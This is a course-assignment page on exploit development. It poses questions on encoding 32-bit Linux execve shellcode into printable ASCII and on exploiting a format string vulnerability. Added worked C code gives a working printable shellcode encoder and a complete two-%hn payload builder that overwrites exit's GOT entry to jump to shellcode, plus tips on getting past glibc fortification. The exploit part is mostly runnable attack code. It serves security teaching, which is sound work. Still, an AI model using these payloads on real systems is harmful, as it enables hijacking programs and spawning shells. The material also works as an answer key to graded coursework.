Explain how you could exploit the format string


Question 1 The following is a program that tests a shellcode:

/* To compile, use
   gcc -m32 -g -z execstack -o sc2_tiny sc2_tiny.c */
#include <string.h>

/* 25-byte execve("/bin//sh") shellcode for 32-bit Linux; contains no NUL bytes,
   so strcpy() copies it whole */
char shellcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void) {
    char buff[2400];
    void (*fp)(void);
    strcpy(buff, shellcode);          /* copy the shellcode onto the (executable) stack */
    fp = (void (*)(void))buff;        /* treat the buffer as a function ... */
    fp();                             /* ... and jump to it */
    return 0;
}

Encode the shellcode so that it consists only of printable ASCII characters. Note that the decoded shellcode must be byte-for-byte identical to the original. You need to:

1) Modify only the shellcode string in the above program so that it works the same as the original program (i.e., it spawns a shell). Attach your code along with evidence that it works.

2) Demonstrate that the decoded version is the same as the original shellcode. You can use gdb.
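The following encoder is an added worked example for part 1 and part 2; it is not part of the assignment text or of any published solution. It implements the classic printable "sub" encoding: each 4-byte chunk of the shellcode is replaced by three printable dwords a, b, c chosen so that a + b + c == -chunk (mod 2^32). A decoder that zeroes EAX and executes sub eax,a / sub eax,b / sub eax,c is then holding the original chunk and can push it to the stack. The decoder stub itself (which must also be printable x86 code) is only modelled here in C; writing the stub is your part of the exercise. Assumptions made by this example: the printable range is '!' (0x21) to '~' (0x7e), and the shellcode is padded to a whole number of dwords with 0x90 (NOP).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PR_MIN 0x21u   /* '!': lowest byte the encoder may emit (assumption) */
#define PR_MAX 0x7eu   /* '~': highest byte the encoder may emit (assumption) */
#define PAD    0x90u   /* x86 NOP, pads the shellcode to whole dwords */

/* The 25-byte execve("/bin//sh") shellcode from the test program above. */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
#define SC_LEN  (sizeof shellcode - 1)
#define ENC_CAP (((SC_LEN + 3) / 4) * 12)   /* 3 printable dwords per chunk */

static uint32_t load_le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void store_le32(unsigned char *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (v >> (8 * i)) & 0xff;
}

/* Encode dword t as printable dwords a, b, c with a + b + c == -t (mod 2^32).
   Bytes are chosen least significant first; when a byte cannot be reached by
   three printable parts the sum is pushed past 0xff and the next byte absorbs the carry. */
static int encode_dword(uint32_t t, uint32_t out[3]) {
    uint32_t s = (uint32_t)0 - t;        /* 32-bit sum the three terms must reach */
    unsigned carry = 0;
    out[0] = out[1] = out[2] = 0;
    for (int i = 0; i < 4; i++) {
        unsigned total = (s >> (8 * i)) & 0xff;
        if (total < 3 * PR_MIN + carry) total += 256;
        unsigned needed = total - carry;   /* what the three parts must sum to */
        carry = total >> 8;
        unsigned q = needed / 3, r = needed % 3;
        unsigned part[3] = { q + (r > 0), q + (r > 1), q };
        for (int j = 0; j < 3; j++) {
            if (part[j] < PR_MIN || part[j] > PR_MAX) return -1;   /* guard only */
            out[j] |= (uint32_t)part[j] << (8 * i);
        }
    }
    return 0;
}

/* Model of the decoder stub: what the sub chain leaves in EAX for one chunk. */
static uint32_t decode_dword(const uint32_t e[3]) { return (uint32_t)0 - e[0] - e[1] - e[2]; }

/* Single-chunk self-check for an arbitrary 32-bit value. */
int dword_roundtrip(uint32_t t) {
    uint32_t e[3];
    return encode_dword(t, e) == 0 && decode_dword(e) == t;
}

/* Encode len bytes of sc into out (capacity >= 12 bytes per chunk).
   Returns bytes written, 0 on failure. The last chunk is NOP-padded. */
size_t encode_shellcode(const unsigned char *sc, size_t len, unsigned char *out, size_t cap) {
    size_t chunks = (len + 3) / 4, w = 0;
    if (cap < chunks * 12) return 0;
    for (size_t c = 0; c < chunks; c++) {
        unsigned char chunk[4];
        uint32_t e[3];
        for (int i = 0; i < 4; i++) chunk[i] = (c * 4 + i < len) ? sc[c * 4 + i] : PAD;
        if (encode_dword(load_le32(chunk), e) != 0) return 0;
        for (int j = 0; j < 3; j++, w += 4) store_le32(out + w, e[j]);
    }
    return w;
}

/* Decode encode_shellcode() output (out needs enclen / 3 bytes); returns bytes written. */
size_t decode_shellcode(const unsigned char *enc, size_t enclen, unsigned char *out) {
    size_t w = 0;
    for (size_t off = 0; off + 12 <= enclen; off += 12, w += 4) {
        uint32_t e[3] = { load_le32(enc + off), load_le32(enc + off + 4), load_le32(enc + off + 8) };
        store_le32(out + w, decode_dword(e));
    }
    return w;
}

int all_printable(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++) if (buf[i] < PR_MIN || buf[i] > PR_MAX) return 0;
    return 1;
}

/* Part 2 of the question as a check: encode, decode, compare with the original. */
int roundtrip_ok(void) {
    unsigned char enc[ENC_CAP], dec[ENC_CAP];
    size_t n = encode_shellcode(shellcode, SC_LEN, enc, sizeof enc);
    if (n != ENC_CAP || !all_printable(enc, n)) return 0;
    return decode_shellcode(enc, n, dec) >= SC_LEN && memcmp(dec, shellcode, SC_LEN) == 0;
}

int main(void) {
    unsigned char enc[ENC_CAP];
    size_t n = encode_shellcode(shellcode, SC_LEN, enc, sizeof enc);
    printf("encoded (%zu bytes): %.*s\n", n, (int)n, (const char *)enc);
    printf("round trip: %s\n", roundtrip_ok() ? "ok" : "FAILED");
    return roundtrip_ok() ? 0 : 1;
}
```

The stub that consumes this output is also made of printable opcodes: and eax,imm32 is 0x25 ('%'), sub eax,imm32 is 0x2d ('-'), push eax is 0x50 ('P'), and push esp / pop eax / pop esp are 0x54 / 0x58 / 0x5c. EAX can be zeroed with two ANDs whose printable masks share no set bits (for example 0x554e4d4a and 0x2a313235). Because push writes downwards, the chunks have to be pushed last-chunk-first so that the decoded shellcode ends up in its original order, and the stub must arrange for the pushes to land directly after its own end so that execution falls through into the decoded bytes. Verifying in gdb means breaking just before the jump into the decoded region and comparing its 25 bytes (x/25xb) with the original string.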

Question 2 Explain how you could exploit the format string vulnerability in the program so that it displays the following message:

I am on the way to become the King of Penetration Testing.

and does not display the following message:

I am still a novice Penetration Tester.

Then implement and demonstrate your exploit.

Question 3 Develop and implement an exploit of the format string vulnerability in the program so that a shell is created when exit() is called. For this question, you may assume that the stack is executable (by compiling the program with the -z execstack flag). You are free to define additional environment variables.
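Both questions come down to the same primitive: a format string write of an attacker-chosen 32-bit value to an attacker-chosen address (in Question 2 whatever variable selects which message is printed, in Question 3 the GOT entry of exit() so that it points at shellcode placed in an environment variable). The program under attack is not reproduced on this page, so the following payload builder is an added example, not the assignment's program or a published solution. It plans and renders the usual two-%hn write for a 32-bit (-m32) target and replays printf's byte counter to confirm the value that would land in memory. The numbers in main() (exit@GOT at 0x0804a01c, shellcode at 0xffffd5c0, the buffer appearing as printf argument 7) are hypothetical placeholders; in practice each is read out of gdb (x/wx on the GOT slot, the environment variable's address, and %N$x probing for the argument index).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Plan for a 4-byte store done as two 16-bit %hn writes on a 32-bit target. */
struct fmt_write {
    uint32_t addr1, addr2;  /* where the first / second %hn stores */
    unsigned pos1, pos2;    /* printf argument index holding addr1 / addr2 */
    unsigned dummy;         /* argument index the padding %x reads */
    unsigned pad1, pad2;    /* field widths that advance printf's counter */
};

/* argpos: printf argument index at which the first 4 bytes of the attacker's
   buffer appear (found by probing with %N$x, e.g. under gdb).
   prefix: bytes the program prints before the buffer, 0 if the format string
   starts with the buffer. Returns -1 if an address contains a NUL byte. */
int plan_fmt_write(uint32_t target, uint32_t value, unsigned argpos, unsigned prefix, struct fmt_write *w) {
    unsigned lo = value & 0xffff, hi = value >> 16;
    int lo_first = lo <= hi;            /* the counter only grows: smaller half first */
    unsigned v1 = lo_first ? lo : hi, v2 = lo_first ? hi : lo;
    w->addr1 = lo_first ? target : target + 2;
    w->addr2 = lo_first ? target + 2 : target;
    w->pos1 = argpos; w->pos2 = argpos + 1; w->dummy = argpos + 2;
    unsigned printed = prefix + 8;      /* the two raw addresses are printed too */
    w->pad1 = (v1 - printed) & 0xffff;
    w->pad2 = (v2 - v1) & 0xffff;
    /* %x may emit up to 8 digits, so a width below 8 is not exact; go once more
       round the 16-bit counter instead (harmless, %hn keeps the low 16 bits). */
    if (w->pad1 < 8) w->pad1 += 0x10000;
    if (w->pad2 < 8) w->pad2 += 0x10000;
    for (int i = 0; i < 4; i++)
        if (!((w->addr1 >> (8 * i)) & 0xff) || !((w->addr2 >> (8 * i)) & 0xff)) return -1;
    return 0;
}

/* Render: [addr1][addr2]%D$P1x%pos1$hn%D$P2x%pos2$hn, everything positional. */
size_t render_fmt_write(const struct fmt_write *w, unsigned char *out, size_t cap) {
    if (cap < 8) return 0;
    for (int i = 0; i < 4; i++) {
        out[i] = (w->addr1 >> (8 * i)) & 0xff;
        out[4 + i] = (w->addr2 >> (8 * i)) & 0xff;
    }
    int n = snprintf((char *)out + 8, cap - 8, "%%%u$%ux%%%u$hn%%%u$%ux%%%u$hn",
                     w->dummy, w->pad1, w->pos1, w->dummy, w->pad2, w->pos2);
    if (n < 0 || (size_t)n >= cap - 8) return 0;
    return 8 + (size_t)n;
}

/* Replay printf's byte counter over the plan and return the 32-bit value the
   two %hn stores leave at target (little-endian). */
uint32_t simulate_fmt_write(const struct fmt_write *w, uint32_t target, unsigned prefix) {
    uint32_t mem = 0;
    unsigned count = prefix + 8 + w->pad1, sh1 = (w->addr1 - target) * 8;
    mem = (mem & ~(0xffffu << sh1)) | ((count & 0xffff) << sh1);
    count += w->pad2;
    unsigned sh2 = (w->addr2 - target) * 8;
    mem = (mem & ~(0xffffu << sh2)) | ((count & 0xffff) << sh2);
    return mem;
}

/* Self-checks: does the plan store `value`, and does the rendered format part equal `spec`? */
int fmt_write_selftest(uint32_t target, uint32_t value, unsigned argpos, unsigned prefix) {
    struct fmt_write w;
    return plan_fmt_write(target, value, argpos, prefix, &w) == 0 &&
           simulate_fmt_write(&w, target, prefix) == value;
}
int fmt_write_matches(uint32_t target, uint32_t value, unsigned argpos, unsigned prefix, const char *spec) {
    struct fmt_write w; unsigned char buf[128];
    if (plan_fmt_write(target, value, argpos, prefix, &w) != 0) return 0;
    size_t n = render_fmt_write(&w, buf, sizeof buf);
    return n == 8 + strlen(spec) && memcmp(buf + 8, spec, strlen(spec)) == 0;
}

int main(void) {
    /* Hypothetical numbers: exit's GOT slot in the target binary and the
       address of the shellcode placed in an environment variable. */
    uint32_t exit_got = 0x0804a01cu, sc_addr = 0xffffd5c0u;
    struct fmt_write w; unsigned char buf[128];
    if (plan_fmt_write(exit_got, sc_addr, 7, 0, &w) != 0) return 1;
    size_t n = render_fmt_write(&w, buf, sizeof buf);
    for (size_t i = 0; i < n; i++)
        if (buf[i] >= 0x20 && buf[i] < 0x7f) putchar(buf[i]); else printf("\\x%02x", buf[i]);
    printf("\nsimulated store at 0x%08x: 0x%08x\n", (unsigned)exit_got,
           (unsigned)simulate_fmt_write(&w, exit_got, 0));
    return 0;
}
```

Two practical caveats when feeding the rendered bytes to the real program: glibc's fortified printf (_FORTIFY_SOURCE) aborts both on %n with a format string in writable memory and on positional %N$ arguments when lower-numbered positions are left unreferenced, so the assignment's build (no fortification, -z execstack) is what this payload expects; and the raw addresses go first only because the page's program is assumed to print the buffer from its start, which is why prefix is a parameter rather than a constant.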

Computer Engineering: Explain how you could exploit the format string
Reference No:- TGS02520251